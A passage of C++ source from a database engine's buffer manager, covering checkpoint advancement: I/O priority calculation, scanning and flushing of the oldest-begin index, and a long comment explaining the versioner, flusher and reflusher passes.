qosIO = QosOSFileFromUrgentLevel( 33 ); // ? - 11 IOs outstanding
}
else
{
AssertSz( fFalse, "Somehow we didn't cover this cioMax = %d ??", cioMax );
}
// now add the OS low priority IO
qosIO = ( qosIO | qosIOOSLowPriority );
return qosIO;
}
/* AKR_TODO - how to make this test work
JETUNITTEST( BF, CheckpointToQOSLevelMath )
{
CHECK( 1 == 1 ); // testing, check, check, testing, 1, 2, 3
// Cruft up a new LOG so we can use member variables off it ... yes, we're doing an horrible, horrible thing here ...
BYTE * pb = new BYTE[ sizeof(LOG) ];
memset( pb, 0, sizeof(LOG) );
LOG * volatile plog = (LOG *)pb; // declare the plog that the rest of this (disabled) test dereferences
BYTE *pb2 = new BYTE[ sizeof(LOG_STREAM) ];
LOG_STREAM * volatile plogstream = (LOG_STREAM *)pb2;
plog->m_pLogStream = plogstream;
// Used by LOG::CbLGOffsetLgposForOB0()
#ifdef DEBUG
plog->m_fSectorSizeDuringInitOK = fTrue;
#endif // DEBUG
plog->m_pLogStream->m_cbSec_ = 512;
plog->m_pLogStream->m_cbSecVolume = 512;
plog->m_pLogStream->UpdateCSecLGFile();
LGPOS lgposNewest;
LGPOS lgposOB0;
lgposOB0.ib = 20;
lgposOB0.isec = 70;
lgposOB0.lGeneration = 21;
lgposNewest.ib = 25; // slightly ahead ...
lgposNewest.isec = 70;
lgposNewest.lGeneration = 41;
// testing just over the checkpoint ...
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// testing the free zone 1.00001 - 1.25x checkpoint always gives regular background QOS ...
lgposNewest.lGeneration = 42;
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
lgposNewest.lGeneration = 43;
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
lgposNewest.lGeneration = 44;
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
lgposNewest.lGeneration = 45;
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// Just below the urgent zone / 1.25x checkpoint ...
lgposNewest.isec = 60;
lgposNewest.lGeneration = 46;
CHECK( qosIODispatchBackground == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// just above again ...
lgposNewest.isec = 70;
CHECK( qosIODispatchBackground != QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
CHECK( qosIODispatchUrgentBackgroundMin == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// should be urgency 3
lgposNewest.lGeneration = 47;
CHECK( QosOSFileFromUrgentLevel( 3 ) == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
lgposNewest.isec += 1024; // adds 512 KB, which puts this in the next chunk of urgency ...
CHECK( QosOSFileFromUrgentLevel( 4 ) == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// should still be going linearly up
lgposNewest.lGeneration += 10;
CHECK( QosOSFileFromUrgentLevel( 24 ) == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// improve the OB0 a little, to make sure we tested 2 OB0 values, should drop us 2 urgency levels
lgposOB0.lGeneration += 1;
CHECK( QosOSFileFromUrgentLevel( 22 ) == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// test near the end ...
lgposNewest.lGeneration += 52; // ( 127 - 22 ) / 2 ... to find near end
CHECK( QosOSFileFromUrgentLevel( 126 ) == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// test the end ... raise 1/2 a log
lgposNewest.isec -= 1024; // isec raised above, set it back down
lgposNewest.lGeneration += 1; // and inc log
CHECK( QosOSFileFromUrgentLevel( 127 ) == qosIODispatchUrgentBackgroundMax );
CHECK( qosIODispatchUrgentBackgroundMax == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// test past the end is capped ...
lgposNewest.lGeneration += 1;
CHECK( qosIODispatchUrgentBackgroundMax == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
lgposNewest.lGeneration += 100;
CHECK( qosIODispatchUrgentBackgroundMax == QosBFIMaintCheckpointPriority( plog, lgposNewest, 20 * 1024 * 1024, lgposOB0 ) );
// Be a good citizen, even in test code
delete [] pb;
}
*/
ERR ErrBFIOB0MaintEntry(
IFMP ifmp,
BFFMPContext * pbffmp,
BF * pbf,
BFOB0::CLock * plockOnOB0,
__in const LGPOS& lgposNewest,
__in const QWORD cbCheckpointDepth,
const BFOB0MaintOperations fOperations
)
{
ERR err = JET_errSuccess;
// If we're not using the OB0, we better own the ob0ol crit ...
Assert( plockOnOB0 || pbffmp->critbfob0ol.FOwner() );
pbffmp->ChkAdvData.cEntriesVisited++;
if ( fOperations & bfob0moCleaning )
{
// if we found a clean BF in the OB0 then delete it
//
// NOTE: we delete these BFs when walking the OB0 index for many
// reasons. first, we MUST defer these deletes until some point
// after a BF is written to disk because not doing so would cause
// a deadlock (see BFICleanPage for more information). second, it
// is better to have as few threads as possible concurrently using
// this index. third, we need to delete these entries so that we
// do not spend huge amounts of time scanning through clean BFs
// trying to find the dirty BFs we are trying to flush
if ( pbf->bfdf == bfdfClean &&
pbf->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
if ( pbf->bfdf == bfdfClean ) // establish pre-latch condition still holds.
{
if ( plockOnOB0 )
{
// if we found a clean BF in the OB0 index then delete it
BFOB0::ERR errOB0;
errOB0 = pbffmp->bfob0.ErrDeleteEntry( plockOnOB0 );
Assert( errOB0 == BFOB0::ERR::errSuccess );
pbf->lgposOldestBegin0 = lgposMax;
}
else
{
// if we found a clean BF in the OB0 overflow list then delete it
pbf->fInOB0OL = fFalse;
pbffmp->bfob0ol.Remove( pbf );
pbf->lgposOldestBegin0 = lgposMax;
}
pbffmp->ChkAdvData.cCleanRemoved++;
pbf->sxwl.ReleaseExclusiveLatch();
goto HandleError;
}
pbf->sxwl.ReleaseExclusiveLatch();
}
}
if ( fOperations & bfob0moFlushing )
{
// bfob0moFlushing requires bfob0moCleaning to run correctly ...
Assert( fOperations & bfob0moCleaning );
// Can't do flushing w/o effectively also versioning (b/c of ErrBFIPrepareFlush()), though
// technically we could turn off Ptls()->fCheckpoint here before calling ErrBFIFlushPage()
// and avoid this behavior; until someone needs it, why bother.
Assert( fOperations & bfob0moVersioning );
// if we found a dirty BF in the OB0 index then flush it
if ( CmpLgpos( &pbf->lgposOldestBegin0, &lgposMax ) ) // note we're making an unlatched read of bf state here, but tis ok.
{
// Calculate the priority of this BF IO ...
const OSFILEQOS qosIO = ( fOperations & bfob0moQuiescing ) ?
QosBFIMaintCheckpointQuiescePriority() :
QosBFIMaintCheckpointPriority( PinstFromIfmp( ifmp ), lgposNewest, cbCheckpointDepth, pbf->lgposOldestBegin0 );
if ( qosIO != qosIODispatchBackground )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Checkpoint advancement falling behind, escalating BF page=[0x%x:0x%x] flush to 0x%I64x", (ULONG)pbf->ifmp, pbf->pgno, qosIO ) );
}
// Try to flush the page to disk
err = ErrBFIFlushPage( pbf, IOR( iorpBFCheckpointAdv ), qosIO );
switch( err )
{
case errBFIPageFlushed:
pbffmp->ChkAdvData.cFlushErrPageFlushed++;
break;
case errBFIPageFlushPending:
case errBFIPageFlushPendingSlowIO:
case errBFIPageFlushPendingHungIO:
pbffmp->ChkAdvData.cFlushErrPageFlushPending++;
break;
case errBFIRemainingDependencies:
pbffmp->ChkAdvData.cFlushErrRemainingDependencies++;
break;
case errBFIDependentPurged:
pbffmp->ChkAdvData.cFlushErrDependentPurged++;
break;
case errBFLatchConflict:
// In the case of a latch conflict it is a perfect time to try to
// mark this BF for versioning, because we don't need the latch
// to do that, and as it gets unlatched it very well could get
// immediately versioned for us.
BFIFlagDependenciesImpeding( pbf );
pbffmp->ChkAdvData.cFlushErrLatchConflict++;
break;
case errBFIPageTouchTooRecent:
// returned due to the waypoint protecting this page (or a dependent page)
pbffmp->ChkAdvData.cFlushErrPageTouchTooRecent++;
break;
case errBFIPageFlushDisallowedOnIOThread:
AssertSz( fFalse, "Shouldn't see errBFIPageFlushDisallowedOnIOThread in " __FUNCTION__ );
break;
case JET_errSuccess:
pbffmp->ChkAdvData.cFlushErrSuccess++;
break;
default:
// This can happen with other errors, like log full and errDiskTilt ...
pbffmp->ChkAdvData.cFlushErrOther++;
break;
}
Call( err );
}
}
else if ( ( fOperations & bfob0moVersioning ) && !( fOperations & bfob0moFlushing ) )
{
// We only want to version, this is only done for the overscan range
if ( CmpLgpos( &pbf->lgposOldestBegin0, &lgposMax ) )
{
BFIFlagDependenciesImpeding( pbf );
}
}
HandleError:
return err;
}
ERR ErrBFIOB0MaintScan(
const IFMP ifmp,
BFFMPContext * const pbffmp,
__in const LGPOS& lgposNewest,
__in const QWORD cbCheckpointDepth,
BFOB0::CLock * const plockOB0, // we pass the plock only so we can keep the stats across calls run.
LGPOS lgposStartBM,
__inout LGPOS * const plgposStopBM,
__out LGPOS * const plgposForwardFlushProgressBM,
enum BFOB0MaintOperations fOperations
)
{
ERR err = JET_errSuccess;
BOOL fTracedInitBM = fFalse;
BOOL fHadFlushErr = fFalse;
BOOL fSetUrgentCtr = 0 != CmpLgpos( lgposMin, lgposStartBM ); // inhibits setting unless we start from lgposMin
//
// Validate in parameters ...
//
Assert( fOperations ); // at least one op should be specified.
Assert( plgposStopBM );
Assert( lgposStartBM.lGeneration >= 0 );
Assert( plgposStopBM->lGeneration >= 0 );
Assert( CmpLgpos( *plgposStopBM, lgposMax ) != 0 ); // don't use a BM that is not ridiculously far out.
if ( plgposForwardFlushProgressBM )
{
*plgposForwardFlushProgressBM = lgposMin;
}
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s ( ifmp=0x%x, lgposStartBM=%08x:%04x:%04x, *plgposStopBM=%08x:%04x:%04x, %s%s%s )",
__FUNCTION__,
(ULONG)ifmp,
lgposStartBM.lGeneration, lgposStartBM.isec, lgposStartBM.ib,
plgposStopBM->lGeneration, plgposStopBM->isec, plgposStopBM->ib,
fOperations & bfob0moCleaning ? "Clean" : "",
fOperations & bfob0moFlushing ? "Flush" : "",
fOperations & bfob0moVersioning ? "Versn" : ""
) );
//
// We start by rounding up to where we will really be stopping (due to OB0 uncertainty) ...
//
*plgposStopBM = BFIOB0Lgpos( ifmp, *plgposStopBM, fTrue );
if ( CmpLgpos( lgposStartBM, *plgposStopBM ) >= 0 )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s start/end BMs same, nothing to do. [ifmp=0x%x]", __FUNCTION__, (ULONG)ifmp ) );
if ( plgposForwardFlushProgressBM )
{
*plgposForwardFlushProgressBM = *plgposStopBM;
}
return( JET_errSuccess );
}
if ( 0 == CmpLgpos( lgposStartBM, lgposMin ) )
{
// Don't actually start at lgposMin, that'd be hideously expensive,
// just move to beginning.
pbffmp->bfob0.MoveBeforeFirst( plockOB0 );
}
else
{
pbffmp->bfob0.MoveBeforeKeyPtr( BFIOB0Offset( ifmp, &lgposStartBM ), NULL, plockOB0 );
}
while ( pbffmp->bfob0.ErrMoveNext( plockOB0 ) != BFOB0::ERR::errNoCurrentEntry )
{
PBF pbf;
BFOB0::ERR errOB0;
errOB0 = pbffmp->bfob0.ErrRetrieveEntry( plockOB0, &pbf );
Assert( errOB0 == BFOB0::ERR::errSuccess );
LGPOS lgposOldestBegin0 = BFIOB0Lgpos( ifmp, pbf->lgposOldestBegin0 ); // factor in the OB0 uncertainty
if ( !fTracedInitBM )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s actual starting lgposStartBM=%08x:%04x:%04x [ifmp=0x%x]",
__FUNCTION__,
lgposOldestBegin0.lGeneration,
lgposOldestBegin0.isec,
lgposOldestBegin0.ib,
(ULONG)ifmp ) );
fTracedInitBM = fTrue;
}
if ( !fSetUrgentCtr )
{
if ( fOperations & bfob0moFlushing )
{
const INT iUrgentLevelWorst = IUrgentBFIMaintCheckpointPriority( PinstFromIfmp( pbf->ifmp )->m_plog, lgposNewest, cbCheckpointDepth, lgposOldestBegin0 );
if ( iUrgentLevelWorst )
{
PERFOptDeclare( const INT cioOutstandingMax = CioOSDiskPerfCounterIOMaxFromUrgentQOS( QosOSFileFromUrgentLevel( iUrgentLevelWorst ) ) );
PERFOpt( cBFCheckpointMaintOutstandingIOMax.Set( PinstFromIfmp( pbf->ifmp ), cioOutstandingMax ) );
}
else
{
PERFOpt( cBFCheckpointMaintOutstandingIOMax.Set( PinstFromIfmp( pbf->ifmp ), 1 ) );
}
}
fSetUrgentCtr = fTrue;
}
if ( CmpLgpos( &lgposOldestBegin0, plgposStopBM ) >= 0 )
{
break;
}
// Maintain (flush, clean, etc) this entry
err = ErrBFIOB0MaintEntry( ifmp, pbffmp, pbf, plockOB0, lgposNewest, cbCheckpointDepth, fOperations );
// save progress / currency on the OB0 in case the caller is interested ...
if ( plgposForwardFlushProgressBM )
{
Expected( fOperations & bfob0moFlushing || fOperations & bfob0moCleaning /* for debug */ );
// Why do we treat this as a non-flush error?
// we have found that when maintaining say a checkpoint of 20, and a
// waypoint of 7, we end up maintaining a checkpoint of 27. What we
// end up having is waypoint protected (errBFIPageTouchTooRecent) pages
// stuck in the 20 - 27 range. So we allow ourselves to track progress
// up to the first non-error / first non-waypoint protected BF.
if ( !fHadFlushErr )
{
*plgposForwardFlushProgressBM = lgposOldestBegin0;
if ( err != JET_errSuccess &&
err != errBFIPageTouchTooRecent )
{
// Some kind of flush based error... stop updating flush progress at this point ...
fHadFlushErr = fTrue;
}
}
}
// while eating Chicken Stuffed Tortillas (a wonderful dish, BTW) at the
// Cheesecake Factory, we realized that we must check tiltiness after we
// save progress, otherwise if we get errDiskTilt on the first entry, we
// can be fooled into thinking we reached the plgposStopBM below because
// plgposForwardFlushProgressBM is lgposMin.
if ( err == errDiskTilt )
{
break;
}
}
pbffmp->bfob0.UnlockKeyPtr( plockOB0 );
pbffmp->critbfob0ol.Enter();
PBF pbfNext;
ULONG cIterations = 0;
for ( PBF pbf = pbffmp->bfob0ol.PrevMost(); pbf != pbfNil; pbf = pbfNext )
{
pbfNext = pbffmp->bfob0ol.Next( pbf );
// Note we do not use lgposStartBM here, meaning we scan everything from
// lgposMin to less than the lgposStopBM. I figure since there really
// shouldn't be many in the ob0ol, it should be fine from a perf perspective,
// and since no caller has a hard requirement we don't scan anything before
// the lgposStartBM, this is fine.
if ( CmpLgpos( &pbf->lgposOldestBegin0, plgposStopBM ) < 0 )
{
// Maintain (flush, clean, etc) this entry
err = ErrBFIOB0MaintEntry( ifmp, pbffmp, pbf, NULL, lgposNewest, cbCheckpointDepth, fOperations );
if ( err == errDiskTilt )
{
break;
}
}
Assert( cIterations++ < 50 ); // this system won't scale; we should know if this happens ...
}
pbffmp->critbfob0ol.Leave();
if ( plgposForwardFlushProgressBM &&
0 == CmpLgpos( plgposForwardFlushProgressBM, &lgposMin ) )
{
// We visited no entries ....
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s Visited no entries. [ifmp=0x%x]", __FUNCTION__, (ULONG)ifmp ) );
*plgposForwardFlushProgressBM = *plgposStopBM;
}
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s actual stopping plgposStopBM=%08x:%04x:%04x [ifmp=0x%x]",
__FUNCTION__,
plgposStopBM->lGeneration,
plgposStopBM->isec,
plgposStopBM->ib,
(ULONG)ifmp ) );
return err;
}
//
// (diagram assumes fixed width ... alt-F12 in SI)
//
//
// This is the template diagram for checkpoint, waypoint, toflush, and logrec ...
//
// ChkPoint
// Setting ToFlush
// | | LogRec
// | Waypoint | unflushed log buffers
// | | | |
// | | | | future log writes ->
// -------------------------|-----------------------------------|-------------|ooooo| - - - - - - - - - - - -
// | |
// | |
//
// Some notes:
// ChkPoint, aka PreferredCheckpoint is lgposLogRec - the max checkpoint depth param.
// Waypoint, is ToFlush - waypoint latency setting
//
//
// Case 1: No adv needed
// -------------------------|-----------------------------------|-------------|ooooo| - - -
// | |
// OB0 BT0
//
// Probably only during init, or after a lot of idle flushing. Whether OB0
// is before or after BT0 is considered the same case for our purposes in
// checkpoint advancement.
//
//
// Case 2: Inc adv needed, no long running trx
// -------------------------|-----------------------------------|-------------|ooooo| - - -
// | |
// OB0 BT0
//
// Very common case, BT0 is w/in check point, and some incremental amount of
// BFs past the checkpoint need flushing.
//
//
// Case 3: Inc adv needed, no long running trx (the waypoint affect)
// -------------------------|-----------------------------------|-------------|ooooo| - - -
// |xxxxxx x x |
// OB0 BT0
//
// x = Unflushable.
//
// An unfortunately common case, BT0 is w/in check point, and some incremental
// amount of BFs past the checkpoint need flushing, but many of the BFs are
// unflushable due to the waypoint (actually a combination of dependencies and
// the waypoint). We can spin quite a bit of time processing these over and
// over again w/o actually making very much "IO progress" on checkpoint advancement,
// and stay in an aggressive mode, despite the log not having moved forward the 1 log
// needed to reach a state where the waypoint has freed up pages to be flushable.
//
//
// Case 4a: Inc Adv, long running RO trx
// -------------------------|-----------------------------------|-------------|ooooo| - - -
// | |
// BT0 OB0
//
// Occasional case, but must be handled well. OB0 has some incremental flushing
// to do, but a long running transaction is ultimately holding the checkpoint back.
// This can't last too long as the version store will run out eventually.
// Case 4b: Inc Adv, long running RW trx
// -------------------------|-----------------------------------|-------------|ooooo| - - -
// | |
// BT0 OB0
//
// Occasional case, but must be handled well. OB0 has a moderate amount of flushing to
// do, and the long running transaction ultimately holding the checkpoint back,
// is also randomly adding pages to the OB0 making it jump back randomly. This
// can't last too long as the version store will run out eventually. Note
// flushing one of these "uncommitted" pages requires flushing log deferred
// undo info. We handle this ok, but technically if the long running transaction
// pulls the OB0 way back, it might not be until we generate a new log that the
// flusher (Pass N below) gets reset far enough back to pick those pages up again.
//
// So handling those above cases is this method ...
// Preferred Checkpoint
// ChkPoint "Overscan" ToFlush
// ( ChkPoint | LogRec
// | - Waypoint ) Waypoint | unflushed log buffers
// OB0 | | | | |
// | | | | | | future log writes ->
// ---|---------------------|-------------|---------------------|-------------|ooooo| - - - - - - - - - - - -
// | | | |
// | |----> | |
// | Pass II: | |
// | lgposFlusherBM |---> lgposNewest
// |---------------->----> Pass I:
// Pass N: lgposVersionerBM
// OB0 Beginning
//
// We move to multiple passes for checkpoint. Not every pass will happen on every
// run of checkpoint depth maintenance.
//
// Pass I: Versioner
// So to mitigate pages hanging past the checkpoint that are waypoint protected, we make
// the realization that any page that has an OB0 between Preferred Checkpoint and the
// Overscan point AND has a lgposModify within the waypoint is automatically going to
// block the checkpoint from advancing to its preferred position eventually.
//
// So we "overscan" the checkpoint, and mark such pages we visit for versioning, so that
// the older version page will not take new touches and will be flushable by the time it
// reaches the preferred checkpoint. This pass of checkpoint advancement is always
// incremental, and runs from the lgposVersionerBM to the current overscan point.
//
// This pass happens whenever at least a OB0 uncertainty / bucket has passed between
// the lgposVersionerBM and the overscan point. This means it happens pretty regularly
// and incrementally.
//
// Pass II: Flusher
// The case 3 above causes the construction of this pass. We basically track the last
// flushing / IO related push back (i.e. things like errBFIPageFlushed, errBFIPageFlushPending[HungIO],
// errBFIRemainingDependencies (which are flushable), errBFIDependentPurged, and
// errLatchConflict) and start there on each checkpoint advancement. Pass II runs every time
// we do checkpoint advancement.
//
// Future, it might be good to grab the Min BT0 and not allow the flusher to move beyond
// that to protect against case 4b above. Worst case we will wait until a whole log rolls
// over before we re-establish the real point the flusher should be at, this is ?probably?
// responsive enough.
//
// This pass happens every time checkpoint advancement runs.
//
// Pass N: ReFlusher
// Since Pass II flushing moved beyond waypoint protected pages (well dependencies really),
// we will at each log roll over, start Pass N (which in the code is really implemented in
// Pass II, where we pull our Pass II start point back to the beginning of the OB0) any
// time we roll a log file (i.e. freeing up new waypoint pinned pages). Pass N also does
// the work of Pass II when it runs. Pass N has ultimate responsibility for maintaining
// the checkpoint.
//
// This pass happens every time we move to a new transaction log.
// By the way, by resetting for pass N, we rescan from the beginning of the OB0, so we would
// like to not do this too often, if there ends up being many pages that are unflushable due
// to the waypoint. So our rate of doing this, is basically how often a new log is generated.
//
// Some common log rates of the day (dated 7/30/2006) are about 1000 / day, but here are a few
// rates I've collected over the last few years ...
//
// scenario <Jian <Jian <win-msg-10> <high est> <EFleis 50k IOPS
// test> peak> <ave> <peak> SAN load>
// logs/day - - 1000 - 4000 20k 518400
// logs/min 5 20 - 10 - - -
// e2k3 secs - - 86.4 6 21.6 4.32 .1667
// e12 secs 12 3 17.28 1.2 4.32 .864 .0333
//
// (the last two rows are time to generate a log for the two releases, where
// e12 is just 1/5th of e2k3 b/c of 5MB vs 1MB log files).
//
// Allow registry based disabling of overscanning for perf testing...
BOOL g_fBFOverscanCheckpoint = fTrue;
BOOL g_fBFEnableForegroundCheckpointMaint = fTrue;
// tries to flush all pages that are impeding the checkpoint by IFMP
//
// return codes:
// JET_errSuccess - Nothing more to do, quiesce checkpoint depth maint.
// errBFICheckpointWorkRemaining - One or more pages or dependencies are pending IO
// completion, try again later.
// errDiskTilt - Too much IO has been dispatched at once, try again
// when the IO load has dropped.
ERR ErrBFIMaintCheckpointDepthIFlushPagesByIFMP( const IFMP ifmp, BOOL * const pfUpdateCheckpoint )
{
ERR err = JET_errSuccess;
FMP* pfmp = &g_rgfmp[ ifmp ];
Assert( ifmp != ifmpNil );
Assert( pfUpdateCheckpoint );
// if no context is present, there must be no pages impeding the checkpoint
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( !pbffmp || !pbffmp->fCurrentlyAttached )
{
AssertSz( fFalse, "Caller should've protected us from being called when there is no pbffmp (%p), or it is not attached", pbffmp );
return JET_errSuccess;
}
// The statistics need clearing, used below ...
memset( &(pbffmp->ChkAdvData), 0, sizeof(pbffmp->ChkAdvData) );
// get the most recent log record
LOG* const plog = pfmp->Pinst()->m_plog;
// this read of m_lgposLogRec is strictly speaking unsafe, but it is OK, b/c this
// is a maintenance thread, we will either try to adv the checkpoint a bit farther
// than necessary, or not far enough ...
const LGPOS lgposNewest = plog->LgposLGLogTipNoLock();
if( 0 == CmpLgpos( lgposMin, lgposNewest ) )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP [ifmp=0x%x]: Skipping checkpoint maintenance. fRecoveringMode = %d", (ULONG)ifmp, plog->FRecoveringMode() ) );
return err;
}
// If we move by a whole log generation we reset the flusher ...
const BOOL fActivateTheReFlusher = ( pbffmp->lgposLastLogTip.lGeneration < lgposNewest.lGeneration );
pbffmp->lgposLastLogTip = lgposNewest;
// Calculate the preferred checkpoint we would like to move to
LGPOS lgposCPD = lgposMin;
const BOOL fQuiesceCheckpoint = pfmp->Pinst()->m_fCheckpointQuiesce;
const BOOL fUrgentCheckpointUpdate = (BOOL)UlConfigOverrideInjection( 46336, fFalse ) || fQuiesceCheckpoint;
const QWORD cbCheckpointDepth = fQuiesceCheckpoint ? 0 : (QWORD)pfmp->Pinst()->m_plog->CbLGDesiredCheckpointDepth();
lgposCPD.lGeneration = (LONG)( cbCheckpointDepth / ( 1024 * (QWORD)UlParam( pfmp->Pinst(), JET_paramLogFileSize ) ) );
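// (e.g., illustrative: JET_paramLogFileSize is expressed in KB, so with 1024 KB log files and a
//  20 MB desired depth this works out to a 20-generation preferred checkpoint lag.)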
LGPOS lgposPreferredCheckpoint = lgposNewest;
if ( lgposNewest.lGeneration - lgposCPD.lGeneration > 0 )
{
lgposPreferredCheckpoint.lGeneration = lgposNewest.lGeneration - lgposCPD.lGeneration;
}
else
{
lgposPreferredCheckpoint = lgposMin;
}
//
// Note while the waypoint is log granular, we're actually advancing the overscan point a little more
// incrementally because it is calculated off the lgposPreferredCheckpoint which is based upon m_lgposLogRec.
LGPOS lgposCheckpointOverscan = lgposPreferredCheckpoint;
LGPOS lgposWaypointLatency = lgposMin;
lgposWaypointLatency.lGeneration = (LONG)UlParam( pfmp->Pinst(), JET_paramWaypointLatency );
if ( lgposWaypointLatency.lGeneration > 0 )
{
if ( lgposPreferredCheckpoint.lGeneration + lgposWaypointLatency.lGeneration < ( lgposNewest.lGeneration - ( 1 + lgposCPD.lGeneration / 5 ) ) &&
lgposPreferredCheckpoint.lGeneration + lgposWaypointLatency.lGeneration > 0 )
{
lgposCheckpointOverscan.lGeneration = lgposPreferredCheckpoint.lGeneration + lgposWaypointLatency.lGeneration;
}
// else leave overscan at checkpoint ...
// which effectively disables the overscan pass below ... whoever sets waypoint to over 80% of
// the checkpoint be warned.
}
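// (e.g., illustrative: with lgposNewest at gen 127, a 20-gen checkpoint depth (preferred
//  checkpoint gen 107) and a waypoint latency of 7 logs, the overscan point lands at gen 114,
//  since 114 < 127 - ( 1 + 20 / 5 ) == 122.)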
Assert( lgposCheckpointOverscan.lGeneration >= 0 );
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP: Checkpoint Advancement begins [ifmp=0x%x], plan:\r\n"
"CP: lgposPreferredCheckpoint =%08x:%04x:%04x (fQuiesce = %d, fUrgent = %d)\r\n"
"CP: lgposFlusherBM =%08x:%04x:%04x\r\n"
"CP: lgposVersionerBM =%08x:%04x:%04x\r\n"
"CP: lgposCheckpointOverscan =%08x:%04x:%04x\r\n"
"CP: fActivateTheReFlusher =%s",
(ULONG)ifmp,
lgposPreferredCheckpoint.lGeneration, lgposPreferredCheckpoint.isec, lgposPreferredCheckpoint.ib, fQuiesceCheckpoint, fUrgentCheckpointUpdate,
pbffmp->lgposFlusherBM.lGeneration, pbffmp->lgposFlusherBM.isec, pbffmp->lgposFlusherBM.ib,
pbffmp->lgposVersionerBM.lGeneration, pbffmp->lgposVersionerBM.isec, pbffmp->lgposVersionerBM.ib,
lgposCheckpointOverscan.lGeneration, lgposCheckpointOverscan.isec, lgposCheckpointOverscan.ib,
fActivateTheReFlusher ? "yes" : "no"
) );
//
// Check if we need to request a flush map write.
//
CFlushMap* const pfm = pfmp->PFlushMap();
if ( pfm != NULL )
{
const QWORD ibLogTip = ( (QWORD)lgposNewest.lGeneration * pfmp->Pinst()->m_plog->CSecLGFile() + lgposNewest.isec ) * pfmp->Pinst()->m_plog->CbLGSec() + lgposNewest.ib;
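// (ibLogTip is the log tip expressed as an absolute byte offset: whole generations converted to
//  sectors, plus the sector index, times bytes per sector, plus the intra-sector byte offset.)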
const QWORD cbPreferredChktpDepth = (QWORD)UlParam( pfmp->Pinst(), JET_paramCheckpointDepthMax );
if ( pfm->FRequestFmSectionWrite( ibLogTip, cbPreferredChktpDepth ) )
{
// This call does not block waiting for the flush to complete because it issues
// I/O asynchronously. However, it may suffer some contention waiting for the chance
// to acquire write latches on the pages targeted for flushing. In most cases, the owners
// of those locks that prevent entering a write latch are only doing memory operations on I/O
// issuing or completion. Asynchronous I/O against data pages is only performed from this thread
// so no worries there. Synchronous I/O against data pages may be performed in a small number of
// cases (e.g., page patching, DB shrink, DB trimming). The flush map header is probably
// the only potential root of contention because flushing the DB header holds an exclusive latch
// on the flush map header.
pfm->FlushOneSection( ibLogTip );
}
}
//
// Finally perform the passes of checkpoint maintenance based upon the above ...
//
//
// Pass I: Versioner.
//
// If there is overscanning to be done and the overscan point has made at
// least 1 bucket (based on OB0 uncertainty) of progress ...
if ( g_fBFOverscanCheckpoint &&
CmpLgpos( lgposCheckpointOverscan, lgposPreferredCheckpoint ) &&
CmpLgpos( BFIOB0Lgpos( ifmp, pbffmp->lgposVersionerBM ), BFIOB0Lgpos( ifmp, lgposCheckpointOverscan ) )
)
{
BFOB0::CLock lockOB0Pass1;
Assert( CmpLgpos( lgposCheckpointOverscan, lgposPreferredCheckpoint) > 0 );
CallS( ErrBFIOB0MaintScan( ifmp, pbffmp,
lgposMin, 0,
&lockOB0Pass1,
pbffmp->lgposVersionerBM,
&lgposCheckpointOverscan,
NULL,
BFOB0MaintOperations( bfob0moVersioning | bfob0moCleaning ) ) );
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP [ifmp=0x%x]: Pass 1: Versioner: start=%08x,%04x,%04x - stopBM=%08x,%04x,%04x",
(ULONG)ifmp,
pbffmp->lgposVersionerBM.lGeneration, pbffmp->lgposVersionerBM.isec, pbffmp->lgposVersionerBM.ib,
lgposCheckpointOverscan.lGeneration, lgposCheckpointOverscan.isec, lgposCheckpointOverscan.ib
) );
pbffmp->lgposVersionerBM = lgposCheckpointOverscan;
if ( FOSTraceTagEnabled( JET_tracetagBufferManagerMaintTasks ) )
{
char rgOB0Stats[lockOB0Pass1.cchStatsString];
lockOB0Pass1.SPrintStats( rgOB0Stats );
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP [ifmp=0x%x]: Pass 1: Versioner - OB0 Index stats: %s", (ULONG)ifmp, rgOB0Stats ) );
}
}
//
// Pass II | Pass N
//
BFOB0::CLock lockOB0Pass2N;
LGPOS lgposFlushStart;
if ( !fActivateTheReFlusher )
{
//
// Pass II: Regular Flusher.
//
lgposFlushStart = pbffmp->lgposFlusherBM;
}
else
{
//
// Pass N: ReFlusher.
//
